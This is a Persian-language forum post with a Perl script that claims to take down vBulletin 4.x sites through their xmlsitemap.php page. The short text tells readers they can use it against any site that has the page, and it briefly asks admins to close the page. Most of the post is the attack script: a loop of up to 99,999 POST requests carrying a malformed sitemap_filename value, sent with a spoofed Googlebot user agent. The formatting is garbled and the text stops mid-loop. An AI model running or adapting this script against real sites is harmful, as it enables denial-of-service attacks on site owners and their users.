این دیداسر درون پیج xmlsitemap هستش که هر سایتی که این پیج رو داشته باشه,با استفاده از این می تونید دیداس کنید.

مدیران سایت های vb لطفا این پیج رو ببندن.

موفق باشید

کد PHP:
#!/usr/bin/perl
#####################################
# Vbulletin xmlsitemap Denial of Service
#
# Version: 4.*.*
#
# Code Written By Amir
#
# Home : Www.IrIsT.Ir  -  www.irist.ir/forum
#
# Greats : B3HZ4D - C0dex - TaK.FaNaR - Beni_Vanda - 0x0ptim0us - skote_vahshat 
#
# IR Anonymous - silent - Mr.epsilon - sajjad13and11 - Mr-Fardin & All Member In IrIsT.Ir
#
#####################################
use IO::Socket;

$host $ARGV[0];
$path $ARGV[1];

if(!
$ARGV[1])
{
print 
"################################################# \n";
print 
"## Vbulletin xmlsitemap Denial of Service\n";
print 
"## Discoverd By Amir \n";
print 
"## Www.IrIsT.Ir \n";
print 
"################################################# \n";
print 
"## [host] [path] \n";
print 
"## host.com /Vbulletin/\n";
print 
"################################################# \n";
exit();
}
for(
$i=0$i<99999$i++)
{
$socket IO::Socket::INET->new(Proto => "tcp"PeerAddr => $hostPeerPort => "80") or die("[-] Connection faild.\n");
$post "sitemap_filename=%1%1%1%1%1%1%1%1%1%1%1%";
$pack.= "POST " .$path"/xmlsitemap.php HTTP/1.1\r\n";
$pack.= "Host: " .$host"\r\n";
$pack.= "User-Agent: Googlebot/2.1\r\n";
$pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
$pack.= "Content-Length: " .length($post). "\r\n\r\n";
$pack.= $post;
print 
$socket $pack;
syswrite STDOUT"*";